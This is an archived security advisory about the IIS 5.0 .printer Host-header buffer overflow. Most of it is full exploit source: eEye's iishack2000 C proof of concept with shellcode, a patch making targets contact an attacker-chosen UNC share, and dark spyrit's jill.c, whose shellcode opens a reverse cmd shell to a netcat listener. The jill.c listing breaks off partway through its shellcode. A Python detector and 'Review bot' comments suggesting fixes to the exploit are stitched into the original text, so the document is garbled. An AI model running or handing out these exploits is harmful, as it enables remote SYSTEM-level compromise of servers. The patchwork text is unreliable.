COMMAND

    IIS

SYSTEMS AFFECTED

    Windows 2000 IIS 5.0 (with and without SP1)

PROBLEM

    Marc Maiffret from eEye Security found the following.  A wise man once
    said, "When a single exploit is released, it's a good hack.   When
    you are the first to hack each successive version of a product run
    on  millions  of  computers  all  over  the internet, you create a
    dynasty."

    It seems sometimes the greatest discoveries are the ones that are
    the hardest to share with the world.  It's not about a lack of
    wanting to tell everyone but a lack of knowing exactly how to put
    it so that people's jaws do not drop so fast that their heads snap
    back as they realize just how fragile our world is becoming as we
    slowly push society into the digital world people only dreamed
    about years ago.  A world in which everything is being connected
    and little is being done to shore up the large looming gaps that
    exist in today's networked systems.

    This bug was first discovered while Riley Hassel, of eEye Digital
    Security, was updating Retina's CHAM (Common Hacking Attack
    Methods) technology to look for unknown vulnerabilities within
    some of the new features that Windows 2000 IIS 5.0 provides.  One
    of the features that was added to be audited by CHAM was the
    .printer ISAPI filter extension.  Once the .printer ISAPI filter
    was added to the list of ISAPIs to audit, as well as various
    aspects of the new WebDAV functionality within IIS, the latest
    Retina development code was let loose against a test server in our
    lab.  Within a matter of minutes a debugger kicked in on
    inetinfo.exe because of a "buffer overflow error."

    It turns  out the  latest development  code of  Retina was able to
    find  a  buffer   overflow  within  the   .printer  ISAPI   filter
    (C:\WINNT\System32\msw3prt.dll) which  provides Windows  2000 with
    support for the Internet Printing Protocol (IPP) which allows  for
    the web based control of various aspects of networked printers.

    The vulnerability arises when a buffer of approx. 420 bytes is sent
    within the HTTP Host: header for a .printer ISAPI request.

    Example:

        GET /NULL.printer HTTP/1.0
        Host: [buffer]

    Where [buffer] is approx. 420 characters.

    At this point an attacker has successfully caused a buffer overflow
    within IIS and has overwritten EIP.  Now normally the web server
    would  stop  responding  once  you  have  "buffer  overflowed" it.
    However, Windows 2000 will automatically restart the web server if
    it notices that the web server has crashed.  While the feature  is
    nice to help create a longer period of "up time" it is actually  a
    feature that makes  it easier for  remote attacks to  execute code
    against Windows 2000 IIS 5.0 web servers.

    As we  stated earlier  our overflow  is able  to overwrite the EIP
    register  with  whatever  we  want.   That  basically means we can
    overwrite  EIP  with  a  location  in  memory  that  jumps  to our
    "exploit" code, in memory, and then executes our code with  SYSTEM
    level access.

    Ryan Permeh,  resident shellcode  ninja, of  eEye Digital Security
    has created an example exploit to be used as a "proof of concept."
    Their proof of concept exploit will, when run against an IIS 5 web
    server,  create  a  text  document  on  the  remote  server   with
    instructions directing readers to  a webpage on eeye.com  that has
    information on how to patch the  system so that the web server  is
    no longer vulnerable  to this flaw.   This exploit is  to only  be
    considered a  proof of  concept exploit  and any  one with Windows
    2000 should install the Microsoft supplied patch ASAP.

    There is no log because this vulnerability, like most IIS buffer
    overflows, does not get logged.  That means some of the largest
    web servers on the Internet running Windows 2000 are vulnerable
    to this attack and when exploited, there will be no IIS log
    anywhere that records the attack.
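    Since IIS itself records nothing, the request can only be seen by a
    network sensor or reverse proxy in front of the server.  The following
    is an added example, not part of the eEye advisory or of any code on
    this page, of the check such a sensor could apply to a raw HTTP
    request.  It uses only what this page states (the .printer resource,
    the roughly 420-byte Host: value, and the 256-byte limit enforced by
    Microsoft's patch, described further down); the sample requests are
    constructed, and the "probe" versus "overflow" split is the example's
    own refinement.

```python
"""Network-side detector for the IIS 5.0 .printer Host-header overflow.

Added example; it is not part of the eEye advisory or of any exploit on
this page.  It shows the check a sensor or reverse proxy in front of IIS
would apply, using only what the advisory states: the overflow is reached
through a request for a .printer resource, a Host: value of roughly 420
bytes overwrites EIP, and the Microsoft patch refuses any Host: value
longer than 256 bytes.  IIS itself writes no log entry for the request.
"""
import re

PATCH_LIMIT = 256  # longest Host: value the patched msw3prt.dll accepts

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]\r?\n")


def parse_request(raw: bytes):
    """Split one raw HTTP request into (method, target, headers) or None.

    headers is a list of (lower-cased name, raw value) byte pairs.  Values
    are kept as raw bytes so that shellcode in a header stays inspectable.
    """
    m = REQUEST_LINE.match(raw)
    if not m:
        return None
    headers = []
    for line in raw[m.end():].split(b"\n"):
        line = line.rstrip(b"\r")
        if not line:
            break  # blank line ends the header block
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return m.group(1), m.group(2), headers


def is_binary(value: bytes) -> bool:
    """True if the value holds bytes that never occur in a legitimate header."""
    return any(b != 0x09 and (b < 0x20 or b >= 0x7F) for b in value)


def classify_printer_request(raw: bytes) -> str:
    """Return 'benign', 'probe' or 'overflow' for one HTTP request.

    probe    - .printer target whose Host: exceeds the patch limit but is
               printable text (the 257-byte vulnerability checkers).
    overflow - .printer target carrying binary data in any header value
               (shellcode), whatever the Host: length; jill.c, for
               instance, puts its payload in a header of its own.
    """
    parsed = parse_request(raw)
    if parsed is None:
        return "benign"
    _, target, headers = parsed
    # The ISAPI mapping is chosen by the extension of the URL path alone.
    path = target.split(b"?", 1)[0].lower()
    if not path.endswith(b".printer"):
        return "benign"
    if any(is_binary(value) for _, value in headers):
        return "overflow"
    host = b"".join(value for name, value in headers if name == b"host")
    if len(host) > PATCH_LIMIT:
        return "probe"
    return "benign"


def classify_samples() -> dict:
    """Constructed sample requests (not captured traffic) and their verdicts."""
    samples = {
        "normal ipp": b"GET /printers/lab.printer HTTP/1.1\r\nHost: print.example.test\r\n\r\n",
        "257 probe": b"GET /NULL.printer HTTP/1.0\nHost: " + b"A" * 257 + b"\n\n",
        "nop sled": b"GET /NULL.printer HTTP/1.0\r\nHost: " + b"\x90" * 300 + b"\xeb\x03\r\n\r\n",
        "other header": b"GET /NULL.printer HTTP/1.0\r\nBeavuh: " + b"\x95\x8b\xc5" + b"\r\nHost: x\r\n\r\n",
        "not printer": b"GET /index.asp HTTP/1.1\r\nHost: " + b"A" * 500 + b"\r\n\r\n",
    }
    return {name: classify_printer_request(req) for name, req in samples.items()}


if __name__ == "__main__":
    for name, verdict in classify_samples().items():
        print(f"{name:13s} -> {verdict}")
```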

    eEye exploit:

    /***********************************************************************
    iishack 2000 - eEye Digital Security - 2001
    This affects all unpatched windows 2000 machines with the .printer
    isapi filter loaded.  This is purely proof of concept.

    Quick rundown of the exploit:

    Eip overruns at position 260
    i have 19 bytes of code to jump back to the beginning of the buffer.
    (and a 4 byte eip jumping into a jmp esp located in mfc42.dll).  The
    jumpback was kinda weird, requiring a little forward padding to protect
    the rest of the code.

    The buffer itself:
    You only have about 250ish bytes before the overflow(taking into
    account the eip and jumpback), and like 211 after it.  this makes
    things tight.  This is why i hardcoded the offsets and had 2 shellcodes,
    one for each revision.  normally, this would suck, but since iis is kind
    to us, it cleanly restarts itself if we blow it, giving us another chance.

    This should compile clean on windows, linux and *bsd.  Other than that, you
    are on your own, but the vector is a simple tcp vector, so no biggie.

    The vector:

    the overflow happens in the isapi handling the .printer extension.  The actual
    overflow is in the Host: header.  This buffer is a bit weird, so be careful
    what you pass into it.  It has a minimal amount of parsing happening before
    we get it, making some chars not able to be used(or forcing you to encode
    your payload).  As far as i can tell, the bad bytes i've come across are:

    0x00(duh)
    0x0a(this inits a return, basically flaking our buffer)
    0x0d(same as above)
    0x3a(colon: - this seems to be a separator of some kind, didn't have time or
	    energy to reverse it any further,  it breaks stuff, keep it out of
	    your buffer)

    i have a feeling that there are more bad chars, but in the shellcode i've written
    (both this proof of concept and actual port binding shellcode),  i've come across
    problems, but haven't specifically tagged a "bad" char.


    One more thing...  initially, i got this shellcode to fit on the left side of
    the buffer overflow.  something strange was causing it to fail if i had a length
    of under about 315 chars.  This seems strange to me, but it could be something i
    just screwed up writing this code.  This explains the 0x03s padding the end of the
    shellcode.

    Ryan Permeh
    ryan@eeye.com

    greetz: riley, for finding the hole
	    marc, for being a cool boss
	    dale,nicula,firas, for being pimps
	    greg hoglund, for sparking some really interesting ideas on exploitable buffers
	    dark spyrit, for beginning the iis hack tradition
	    I would also like to thank the academy and to all of those who voted....
	    Barry, Levonne, and their $240.00 worth of pudding.
	    http://www.eeye.com/html/research/Advisories/tequila.jpg
    *************************************************************************/




    #ifdef _WIN32
    #include <Winsock2.h>
    #include <Windows.h>
    #define snprintf _snprintf
    #else
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>   /* inet_ntoa() */
    #include <netdb.h>
    #include <unistd.h>      /* close() */
    #endif
    #include <stdio.h>
    #include <stdlib.h>      /* atoi(), exit() */
    #include <string.h>      /* memcpy(), memset(), strlen() */

    void usage();
    unsigned char GetXORValue(char *szBuff, unsigned long filesize);


    unsigned char sc[2][315]={	"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\xb8\xb3\xeb\x74\x27\x49\xea\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00",
				    "\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x2e\xf0\xeb\x74\x4c\x30\xeb\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00"};

    int main (int argc, char *argv[])
    {
	    char request_message[500];
	    int X,sock,sp=0;
	    unsigned short serverport=htons(80);
	    struct hostent *nametocheck;
	    struct sockaddr_in serv_addr;
	    struct in_addr attack;
    #ifdef _WIN32
	    WORD werd;
	    WSADATA wsd;
	    werd= MAKEWORD(2,0);
	    WSAStartup(werd,&wsd);
    #endif
	    printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
	    printf("Vulnerability found by Riley Hassell <riley@eeye.com>\n");
	    printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
	    if(argc < 4) usage();
	    if(argv[1] != NULL)
	    {
		    nametocheck = gethostbyname (argv[1]);
		    if(nametocheck == NULL)
		    {
			    printf("Could not resolve host %s\n",argv[1]);
			    exit(1);
		    }
		    memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
	    }
	    else usage();
	    if(argv[2] != NULL)
	    {
		    serverport=ntohs((unsigned short)atoi(argv[2]));
	    }
	    if(argv[3] != NULL)
	    {
		    sp=atoi(argv[3]);
	    }
	    printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
	    memset(request_message,0x00,500);
	    snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]);
	    sock = socket (AF_INET, SOCK_STREAM, 0);
	    memset (&serv_addr, 0, sizeof (serv_addr));
	    serv_addr.sin_family=AF_INET;
	    serv_addr.sin_addr.s_addr = attack.s_addr;
	    serv_addr.sin_port = serverport;
	    X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
	    if(X==0)
	    {
		    send(sock,request_message,strlen(request_message)*sizeof(char),0);
		    printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
		    printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
	    }
	    else
	    {
		    printf("Couldn't connect\n",inet_ntoa(attack));
	    }
    #ifdef _WIN32
	    closesocket(sock);
    #else
	    close(sock);
    #endif
	    return 0;
    }
    void usage()
    {
	    printf("Syntax:	 iishack2000 <hostname> <server port> <service pack>\n");
	    printf("Example: iishack2000 127.0.0.1 80 0\n");
	    printf("Example: iishack2000 127.0.0.1 80 1\n");
	    exit(1);
    }

    In  some  environments,  security  staff  may  be  responsible for
    identifying which IIS  5.0 servers, out  of a large  collection of
    them, still  do not  have a  fix in  place for this vulnerability.
    The security staff  may not have  any convenient way  to check for
    the existence of c:\www.eEye.com.txt  on every server, and  thus a
    proof-of-concept exploit  that provides  a result  observable over
    the network may be of  interest.  One possibility, which  involves
    only minor changes to the code provided by eEye Digital  Security,
    is to try  to get the  IIS 5.0 system  to access a  UNC share on a
    system  controlled  by  the  security  staff.  Below is a patch to
    iishack2000.c that implements this.

    Example: the security  staff operate a  machine 10.0.0.1 that  has
    some way of logging  any packets sent to  it on tcp ports  139 and
    445  (ipchains,  IP  Filter,  etc.),  and  which  normally sees no
    traffic on those ports.   The machine 10.0.0.2 is  one of a  large
    number  of  IIS  5.0  servers  that  might still have the MS01-023
    vulnerability.   The  setup  of  10.0.0.2  allows  it  to send SMB
    requests to  10.0.0.1, even  though it  normally would  not do so.
    The security staff run this program, e.g.,

        % iishack2000 10.0.0.2 80 0 10.0.0.1
        % iishack2000 10.0.0.2 80 1 10.0.0.1

    and then look at the packet log files.  If there are packets  from
    10.0.0.2 to  10.0.0.1 on  tcp ports  139 or  445, then 10.0.0.2 is
    almost  certainly  vulnerable.    Otherwise,  no  evidence  of   a
    vulnerability has been found.   Presumably more efficient  methods
    will  become  available  later,  but  this  one may be of interest
    since many organizations need to check their IIS 5.0 servers now.

    *** iishack2000.c.old	Wed May  2 23:58:17 2001
    --- iishack2000.c	Wed May  2 23:58:17 2001
    ***************
    *** 86,89 ****
      {
    ! 	char request_message[500];
    ! 	int X,sock,sp=0;
  	    unsigned short serverport=htons(80);
    --- 86,89 ----
      {
    ! 	char ip[16],request_message[500],unc[20];
    ! 	int X,i,len,sock,sp=0;
  	    unsigned short serverport=htons(80);
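    Review bot: the sizes 16 and 20 in this declaration only work together with constants that appear much later (the `<= 15` length check, the `16 - len` padding loop, `unc[19]` as terminator and the 146..164 patch range); a one-line comment here stating the 19-byte layout of `unc` (two leading backslashes, a dotted-quad of at most 15 characters, one separating backslash, 'A' padding up to 19 characters, terminator at index 19) would let a reader verify those loop bounds without recomputing them.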
    ***************
    *** 101,103 ****
  	    printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
    ! 	if(argc < 4) usage();
  	    if(argv[1] != NULL)
    --- 101,103 ----
  	    printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
    ! 	if(argc < 5) usage();
  	    if(argv[1] != NULL)
    ***************
    *** 116,118 ****
  	    }
    ! 	printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
  	    memset(request_message,0x00,500);
    --- 116,142 ----
  	    }
    ! 	if(argv[4] != NULL && strlen(argv[4]) <= 15)
    ! 	{
    ! 		strcpy(ip, argv[4]);
    ! 		strcpy(&unc[2], argv[4]);
    ! 		len = strlen(argv[4]);
    ! 	}
    ! 	else
    ! 	{
    ! 		strcpy(ip, "127.0.0.1");
    ! 		strcpy(&unc[2], "127.0.0.1");
    ! 		len = strlen("127.0.0.1");
    ! 	}
    ! 	unc[0] = '\\';
    ! 	unc[1] = '\\';
    ! 	unc[len + 2] = '\\';
    ! 	for (i = 0; i < 16 - len; ++i)
    ! 	{
    ! 		unc[len + 3 + i] = 'A';
    ! 	}
    ! 	unc[19] = '\0';
    ! 	for (i = 146; i <= 164; ++i)
    ! 	{
    ! 		sc[sp][i] = unc[i - 146] ^ 3;
    ! 	}
    ! 	printf("Sending string to overflow sp %d for host: %s on port:%d and contact %s\n",sp,inet_ntoa(attack),htons(serverport),ip);
  	    memset(request_message,0x00,500);
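    Review bot: two correctness problems in this hunk. First, the else branch silently substitutes 127.0.0.1 when argv[4] is longer than 15 characters, so a mistyped log host makes the tested server open a UNC path to itself, nothing reaches the log host, and the operator reads the silence as "patched"; call usage() there instead of falling back. Second, `sc[sp][i] = unc[i - 146] ^ 3;` feeds the address through the payload's XOR-3 decoder, and the digit '9' (0x39) encodes to 0x3a, which the header comment lists as a byte that breaks the Host: buffer; a log host whose address contains a 9 (anything in 192.168.0.0/16, for example) therefore cannot produce a result, so the code should validate that argv[4] is a dotted-quad, reject addresses containing '9', and say why in the error message.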
    ***************
    *** 128,131 ****
  		    send(sock,request_message,strlen(request_message)*sizeof(char),0);
    ! 		printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
    ! 		printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
  	    }
    --- 152,155 ----
  		    send(sock,request_message,strlen(request_message)*sizeof(char),0);
    ! 		printf("Sent overflow, now look at logs on %s for SMB packets from %s\n",ip,inet_ntoa(attack));
    ! 		printf("If no packets were logged, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
  	    }
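    Review bot: the success message should name the ports to watch for (TCP 139 and 445, as the accompanying text states), since this line is the only instruction the operator gets after sending the probe.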
    ***************
    *** 144,148 ****
      {
    ! 	printf("Syntax:	 iishack2000 <hostname> <server port> <service pack>\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 0\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 1\n");
  	    exit(1);
    --- 168,172 ----
      {
    ! 	printf("Syntax:	 iishack2000 <hostname> <server port> <service pack> <log host>\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 0 10.0.0.1\n");
    ! 	printf("Example: iishack2000 127.0.0.1 80 1 10.0.0.1\n");
  	    exit(1);
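    Review bot: the usage text should say that `<log host>` must be a dotted-quad IP address of at most 15 characters, not a hostname: argv[4] is copied verbatim into the UNC path by `strcpy(&unc[2], argv[4]);` in the earlier hunk and is never resolved, and a longer value is silently replaced by 127.0.0.1.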

    dark spyrit did another exploit:

    /* IIS 5 remote .printer overflow. "jill.c" (don't ask).
    *
    *  by: dark spyrit <dspyrit@beavuh.org>
    *
    *  respect to eeye for finding this one - nice work.
    *  shouts to halvar, neofight and the beavuh bitchez.
    *
    *  this exploit overwrites an exception frame to control eip and get to
    *  our code.. the code then locates the pointer to our larger buffer and
    *  execs.
    *
    *  usage: jill <victim host> <victim port> <attacker host> <attacker port>
    *
    *  the shellcode spawns a reverse cmd shell.. so you need to set up a
    *  netcat listener on the host you control.
    *
    *  Ex: nc -l -p <attacker port> -vv
    *
    *  I haven't slept in years.
    */

    #include <sys/types.h>
    #include <sys/time.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <fcntl.h>
    #include <netdb.h>

    int main(int argc, char *argv[]){

    /* the whole request rolled into one, pretty huh? carez. */

    unsigned char sploit[]=
    "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
    "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
    "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
    "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
    "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
    "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
    "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
    "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
    "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
    "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
    "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
    "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
    "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
    "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
    "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
    "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
    "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
    "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
    "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
    "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
    "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
    "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
    "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
    "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
    "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
    "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
    "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
    "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
    "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
    "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
    "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
    "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
    "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
    "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
    "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
    "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
    "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
    "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
    "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
    "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
    "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
    "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
    "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
    "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
